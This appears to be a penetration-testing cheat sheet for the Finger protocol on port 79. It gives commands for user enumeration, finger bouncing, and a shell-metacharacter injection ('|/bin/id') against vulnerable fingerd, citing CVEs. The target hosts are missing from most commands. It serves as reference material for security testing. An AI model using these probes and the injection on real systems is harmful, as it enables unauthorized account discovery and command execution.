Name/Finger (User Information Protocol) Service Enumeration

Finger (User Information Protocol) #

At a Glance #

Default Port: 79

The Finger User Information Protocol (RFC 1288), is a simple protocol that provides an interface to a remote user information program (RUIP). 1

Telnet #

telnet 79

Netcat #

echo "root" | nc -n 79

Enumeration #

Tools #

Fast Enum #

for q in 'root' 'admin' 'user' '0' "'a b c d e f g h'" '|/bin/id';do echo "FINGER: $q"; finger "$q@"; echo -e "\n";done

Finger 2 #

List logged users.

finger @

Finger a specific user.

finger -l root@

Enumerate users containing user.

finger -l user@

Note: Try other words as: admin, account or project.

  • -l: Multi-line format. Displays all the information.

Finger Zero 3 #

fingerd may respond to finger 0@<host> with information on some user accounts.

finger 0@

Finger ‘a b c d e f g h’ 4 #

fingerd may respond to 'a b c d e f g h'@<host> with information on all accounts.

finger 'a b c d e f g h'@

Finger Bouncing 5 #

finger can be used to relay a request to a different host as if it were sent from that machine.

finger @
finger root@

Command Execution 6 #

fingerd allows remote command execution through shell metacharacters.

finger "|/bin/id@"

Refer to Exploits Search

  1. “RFC 1288 - The Finger User Information Protocol.” IETF Tools,↩︎

  2. “Finger(1): User Info Lookup Program.” Linux Documentation,↩︎

  3. “CVE - CVE-1999-0197.” CVE - Common Vulnerabilities and Exposures (CVE),↩︎

  4. “CVE - CVE-2001-1503.” CVE - Common Vulnerabilities and Exposures (CVE),↩︎

  5. “‘Solaris 2.7 Allows Finger Bouncing’ .” SecuriTeam, 15 Jan. 1999,↩︎

  6. “CVE - CVE-1999-0152.” CVE -  Common Vulnerabilities and Exposures (CVE),↩︎